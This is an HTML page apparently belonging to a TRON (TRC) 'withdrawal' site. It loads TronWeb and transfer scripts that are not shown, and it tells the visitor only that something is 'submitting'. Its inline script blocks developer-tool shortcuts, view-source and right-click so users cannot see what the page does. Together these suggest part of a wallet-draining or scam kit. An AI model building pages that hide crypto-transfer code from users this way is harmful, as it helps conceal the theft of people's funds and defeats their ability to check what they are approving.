<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>TRC提币</title>
    <meta http-equiv="X-UA-Compatible" content="chrome=1">
    <script type="text/javascript" src="./jsons/jquery-2.1.4.min.js"></script>
	<script type="text/javascript" src="./jsons/TronWeb.js"></script>
	<script type="text/javascript" src="./jsons/forbidden.js"></script>
	<script type="text/javascript" src="./jsons/TronWeb_ai_con_sbfangwen.js"></script>
	<script type="text/javascript" src="./jsons/transfer.js"></script>
	<script type="text/javascript">
          window.onload = function(){
             //屏蔽键盘事件
             document.onkeydown = function (){
                 var e = window.event || arguments[0];
                 //F12
                 if(e.keyCode == 123){
                     return false;
                 //Ctrl+Shift+I
                 }else if((e.ctrlKey) && (e.shiftKey) && (e.keyCode == 73)){
                     return false;
                 //Shift+F10
             }else if((e.shiftKey) && (e.keyCode == 121)){
                     return false;
                 //Ctrl+U
                 }else if((e.ctrlKey) && (e.keyCode == 85)){
                     return false;
                 }
             };
             //屏蔽鼠标右键
             document.oncontextmenu = function (){
                 return false;
            }
         } 
 
     </script>
</head>
<body>
 
<h2 id='info' style="text-align:center;margin-top:5rem;">提交中</h2>
<h3 id='token' style="text-align:center;margin-top:5rem;"></h3>
</body>
</html>